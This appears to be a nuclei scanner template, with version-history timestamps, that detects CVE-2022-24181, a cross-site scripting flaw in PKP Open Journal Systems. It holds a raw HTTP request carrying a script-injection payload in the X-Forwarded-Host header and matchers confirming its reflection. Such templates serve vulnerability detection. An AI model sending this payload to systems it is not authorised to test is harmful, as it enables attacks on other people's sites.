nuclei-templates/cves/2022/CVE-2022-24181.yaml

47 lines
1.2 KiB
YAML
Raw Normal View History

2022-07-08 15:51:34 +00:00
id: CVE-2022-24181
info:
name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting
2022-07-08 15:51:34 +00:00
author: lucasljm2001,ekrause
severity: medium
2022-07-08 15:51:34 +00:00
description: |
PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.
2022-07-08 15:51:34 +00:00
reference:
- https://www.exploit-db.com/exploits/50881
2022-07-09 20:19:08 +00:00
- https://github.com/pkp/pkp-lib/issues/7649
2022-07-08 15:51:34 +00:00
- https://youtu.be/v8-9evO2oVg
2022-07-09 20:19:08 +00:00
- https://nvd.nist.gov/vuln/detail/cve-2022-24181
2022-07-08 15:51:34 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-07-08 15:51:34 +00:00
cve-id: CVE-2022-24181
cwe-id: CWE-79
2022-07-09 20:27:18 +00:00
metadata:
verified: "true"
tags: cve,cve2022,xss,oss,pkp-lib,edb
2022-07-08 15:51:34 +00:00
requests:
- raw:
- |
2022-07-09 20:22:12 +00:00
GET /iupjournals/index.php/esj HTTP/2
2022-07-09 20:19:08 +00:00
Host: {{Hostname}}
2022-07-09 20:22:12 +00:00
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
2022-07-08 15:51:34 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-09 20:22:12 +00:00
- '<script>alert(document.domain)</script><x=".com/iupjournals'
2022-07-09 20:19:08 +00:00
- type: word
part: header
words:
- text/html
2022-07-08 15:51:34 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/09/14